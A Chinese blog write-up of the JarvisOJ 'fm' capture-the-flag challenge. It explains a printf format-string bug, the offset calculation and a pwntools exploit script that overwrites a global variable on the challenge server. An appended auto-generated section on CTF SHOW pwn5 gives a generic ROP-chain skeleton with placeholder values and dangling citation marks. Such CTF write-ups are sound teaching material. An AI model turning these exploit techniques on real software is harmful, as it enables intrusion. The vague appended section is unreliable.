Javisoj--PWN--fm

本文详细解析了一个格式化字符串漏洞的题目,通过IDA逆向分析确定全局变量x的地址,利用格式化字符串漏洞实现对x值的修改,从3改至4,从而控制程序流程并获取flag。文章介绍了漏洞原理、偏移计算及脚本编写过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

首先IDA看一波:

看到这里就可以很清楚的知道这个肯定是一个格式化字符串的题,因为这个涉及到了更改栈中的元素的值,第一眼看到这个X,你可能有点慌,因为你没有发现有关X的任何定义,不过没关系,没有任何定义就出现在IDA中的变量,他一定就是一个全局变量,在pseudocode界面直接双击x,发现界面发生了跳转:

这个可以直接看到x的地址:0x804A02C,这个在之后的格式化字符串中有着很大的作用,

看完了IDA就可以很清楚的知道这个程序要我们干什么了:首先程序一开始定义了全局变量x的值是3,但是当你要使得x=4时,你才能控制程序,也就是拿到该题的flag,而且printf(&buf)很明显就是一个格式化字符串的漏洞;

知道了原理,接下来就是进行接下来的确定偏移还有脚本的编写:

第一步,确定偏移

在printf下断点,之后运行,随意输入一串字符,我输入的是“aaaaaaa”:

看到stack中的元素,指向我所输入字符串的地址是0xffffcecc,之前的地址是0xffffcea0,这两个地址的差便是我们要求的偏移,两者之差是44,但是我们的每个格式化字符串的大小都是4个字节,所以44/4=11,所以11便是我们要求的偏移,

偏移计算完成,接下来就是写脚本,这边注意有个福利,就是有现成的函数让你使用——fmtstr_payload( 偏移,{地址:更改地址的值 });

有了这个函数,直接给出脚本:

#!/usr/bin/env python
# encoding: utf-8
from pwn import *

#p = process("./fm")
p = remote("pwn2.jarvisoj.com", 9895)

x_add=0x0804A02C
#payload = p32(x_add) + "%11$n"
payload=fmtstr_payload(11,{x_add:4})
p.send(payload)
p.interactive()

直接运行就OK了,成功控制程序:

 

 

### CTF SHOW PWN入门 pwn5 解法 对于CTF SHOW平台上的PWN挑战,尤其是针对`pwn5`这一题目,解决方法通常涉及对二进制漏洞的理解以及如何利用这些漏洞来获取flag。 #### 题目分析 在处理这类问题时,首先需要下载并理解目标程序的行为模式。通过逆向工程工具如IDA Pro或Ghidra可以查看可执行文件内部结构,识别潜在的安全缺陷[^1]。 #### 漏洞发现 经过初步审查后得知此题存在栈溢出的可能性。当输入长度超过缓冲区大小时未作适当检查便直接复制到固定空间内,这使得攻击者能够覆盖返回地址从而控制EIP寄存器指向任意位置执行恶意代码片段[^2]。 #### 利用技巧 为了成功完成该关卡,需构建特定格式的数据包作为输入发送给服务端进程。这里采用的方法是构造ROP链(Return-Oriented Programming Chain),即精心挑选一系列现有指令序列组合起来实现所需功能而不必注入额外shellcode: ```python from pwn import * context(os="linux", arch="amd64") binary_path = './path_to_binary' elf = ELF(binary_path) # 远程连接设置 host, port = "remote_host", 1234 conn = remote(host, int(port)) # 构造payload offset = ... # 计算偏移量 ret_address = ... pop_rdi_ret_gadget = ... payload = b'A' * offset + \ p64(pop_rdi_ret_gadget) + \ p64(target_function_arg) + \ p64(ret_address) conn.recvuntil(b'Tell me your name:') conn.sendline(payload) ``` 上述Python脚本展示了基本框架,实际应用中还需根据具体情况调整参数值,比如计算正确的偏移量(offset),找到合适的gadgets等[^3]。 #### 获取Flag 一旦成功触发了预期行为,则可以通过读取内存中的字符串或其他方式获得最终答案。例如,在某些情况下可能需要解析动态链接库表项以定位标准I/O函数的实际映射地址,进而打印出隐藏信息;而在另一些场景下则可能是直接调用了puts()之类的API输出预设好的标志位[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值